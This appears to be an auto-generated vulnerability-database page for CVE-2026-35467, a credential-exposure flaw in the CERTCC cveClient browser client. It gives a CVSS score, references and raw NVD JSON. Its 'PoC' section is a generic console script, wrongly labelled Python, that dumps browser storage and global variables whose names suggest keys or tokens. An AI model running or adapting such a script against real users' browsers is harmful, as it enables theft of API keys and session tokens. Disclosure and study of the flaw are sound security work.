CVE-2026-35467

Description

The stored API keys in temporary browser client is not marked as protected allowing for JavScript console or other errors to allow for extraction of the encryption credentials.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

CERTCC cveClient (修复前版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Proof of Concept: Extracting API keys from browser storage
// Open browser console (F12) and run the following script

// Check LocalStorage
if (localStorage.length > 0) {
    console.log("[+] LocalStorage found:");
    for (let i = 0; i < localStorage.length; i++) {
        let key = localStorage.key(i);
        let value = localStorage.getItem(key);
        console.log(`Key: ${key}, Value: ${value}`);
    }
} else {
    console.log("[-] No LocalStorage data");
}

// Check SessionStorage
if (sessionStorage.length > 0) {
    console.log("[+] SessionStorage found:");
    for (let i = 0; i < sessionStorage.length; i++) {
        let key = sessionStorage.key(i);
        let value = sessionStorage.getItem(key);
        console.log(`Key: ${key}, Value: ${value}`);
    }
} else {
    console.log("[-] No SessionStorage data");
}

// Check for potential keys in global window object
console.log("[+] Scanning window object for potential keys...");
Object.keys(window).forEach(k => {
    if (k.toLowerCase().includes('key') || k.toLowerCase().includes('token') || k.toLowerCase().includes('api')) {
        console.log(`Potential Key found: ${k} = ${window[k]}`);
    }
});

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35467
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35467
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35467/
[4] VulDB https://vuldb.com/cve/CVE-2026-35467
[5] https://github.com/CERTCC/cveClient/
[6] https://github.com/CERTCC/cveClient/pull/39

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35467", "sourceIdentifier": "[email protected]", "published": "2026-04-02T21:16:40.810", "lastModified": "2026-04-03T16:10:23.730", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The stored API keys in temporary browser client is not marked as protected allowing for JavScript console or other errors to allow for extraction of the encryption credentials."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-522"}]}], "references": [{"url": "https://github.com/CERTCC/cveClient/", "source": "[email protected]"}, {"url": "https://github.com/CERTCC/cveClient/pull/39", "source": "[email protected]"}]}}